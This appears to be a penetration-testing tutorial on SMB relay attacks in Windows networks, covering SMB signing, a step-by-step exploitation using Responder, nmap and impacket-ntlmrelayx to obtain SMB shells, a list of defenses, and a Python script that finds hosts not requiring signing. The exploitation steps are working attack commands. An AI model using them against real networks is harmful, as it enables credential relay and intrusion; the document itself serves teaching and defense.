# SMB Relay

## What is SMB?

**SMB (Server Message Block)** is a protocol widely used in Active Directory networks (and any other Windows network) to share files and printers and to communicate between machines, usually Windows machines.

Each Windows machine accepts SMB connections by default. Originally SMB ran on top of NetBIOS (datagram and session services), but nowadays it can be used directly over TCP. Windows computers have port 445/TCP open for direct SMB connections (and 139/TCP for SMB over the NetBIOS session service).

```
                                 .--------
                                |
                                |
                              .---
                   .--NBSSN-->| 139
                   |          '---
         .-----.   |            |  Windows
         | SMB |>--|            |
         '-----'   |            |  machine
            |      |          .---
            |      '---TCP--->| 445
            |                 '---
            |                   |
            |                   |
            |                   '--------
     .------------.
     |            |
  .------.   .----------.
  | NTLM |   | Kerberos |
  '------'   '----------'
```

For an attacker it is useful to understand SMB, since it is used to create shares, which can contain valuable information, and it can be used to exfiltrate data from machines.

## What is SMB Relay?

Instead of cracking the NTLM hashes captured with Responder, we can relay that authentication to specific machines and potentially gain access to them. The following two requirements must be satisfied for an SMB relay attack to work:

* **SMB signing must be disabled** (or not required) on the target
* **The relayed user must have admin rights** on the target machine

## What is SMB Signing?

**SMB signing** verifies the origin and authenticity of SMB packets. Effectively this stops MITM SMB relay attacks, because the relayed session cannot produce valid signatures. If signing is enabled and required on a machine, we will not be able to perform an SMB relay attack against it.

## Exploitation

#### Step 1: Configuration

Edit `/usr/share/responder/Responder.conf` and turn off Responder's own SMB and HTTP servers, so that they do not occupy the ports that ntlmrelayx needs to listen on:

```
SMB = Off
...
HTTP = Off
```

#### Step 2: Run Responder

```shell
responder -I tun0 -dw
```

#### Step 3: Discover hosts with SMB signing disabled

```shell
nmap --script=smb2-security-mode.nse -p445 <CIDR>
```

Save hosts with SMB signing "disabled or not required" into `targets.txt`.

#### Step 4: Use impacket-ntlmrelayx to get a SMB shell

```shell
# -tf: file with hosts that do not require signing; -i: open an interactive
# SMB client shell on a local port (starting at 11000) for each successful relay
impacket-ntlmrelayx -tf targets.txt -smb2support -i
# connect to the interactive shell that ntlmrelayx spawned
nc 127.0.0.1 11000
```

#### Step 5: Wait for an event

When a DNS error is triggered on a victim machine (for example a user mistypes a share or host name) and the machine falls back to LLMNR/NBT-NS name resolution, Responder answers the request, the victim authenticates to us, and ntlmrelayx relays that authentication to a host from `targets.txt`. At that point we win.

## Defense

* **Enable SMB Signing on all devices**
  * Pro: Completely stops the attack
  * Con: Can cause performance issues with file copies (15% loss)
* **Disable NTLM authentication on network**
  * Pro: Completely stops the attack
  * Con: If Kerberos stops working, Windows defaults back to NTLM
* **Account tiering**
  * Pro: Limits domain admins to specific tasks (e.g. they only log on to servers that actually require DA)
  * Con: Enforcing the policy may be difficult
* **Local admin restriction**
  * Pro: Can prevent a lot of lateral movement
  * Con: Potential increase in the amount of service desk tickets
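To verify a signing rollout (and to check the output of the Step 3 scan), the following added script parses nmap's normal output (`-oN`) for the `smb2-security-mode` script and lists every host whose SMB server still does not require signing. It is not part of the original page or of nmap; the scan text is a constructed sample, and the match on "not required" / "disabled" follows the wording the page uses for the script's result.

```python
import re

# Constructed sample of `nmap --script=smb2-security-mode.nse -p445 -oN scan.txt <CIDR>`
# normal output, trimmed to the lines the parser needs. A DC typically reports
# "enabled and required"; workstations often report "enabled but not required".
SAMPLE_SCAN = """\
Nmap scan report for dc01.corp.local (10.0.0.5)
Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required

Nmap scan report for ws07.corp.local (10.0.0.37)
Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required

Nmap scan report for 10.0.0.42
Host script results:
| smb2-security-mode:
|   2.1:
|_    Message signing disabled and not required!
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)(?: \(([\d.]+)\))?")
MODE_RE = re.compile(r"^\|_?\s+Message signing (.+)$")


def parse_signing_modes(scan_text: str) -> dict[str, str]:
    """Map each scanned host (IP when shown, else the name) to its signing mode text."""
    modes, current = {}, None
    for line in scan_text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = m.group(2) or m.group(1)  # prefer the IP in parentheses
            continue
        m = MODE_RE.match(line)
        if m and current:
            modes[current] = m.group(1).strip().rstrip("!")
    return modes


def hosts_not_requiring_signing(modes: dict[str, str]) -> list[str]:
    """Hosts that still need the RequireSecuritySignature fix: a relayed session is accepted there."""
    return sorted(h for h, mode in modes.items()
                  if "not required" in mode or mode.startswith("disabled"))


if __name__ == "__main__":
    for host in hosts_not_requiring_signing(parse_signing_modes(SAMPLE_SCAN)):
        print(f"{host}: SMB signing not required")
```

Run it against the real scan file with `parse_signing_modes(open("scan.txt").read())`; an empty result means every scanned host enforces signing.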
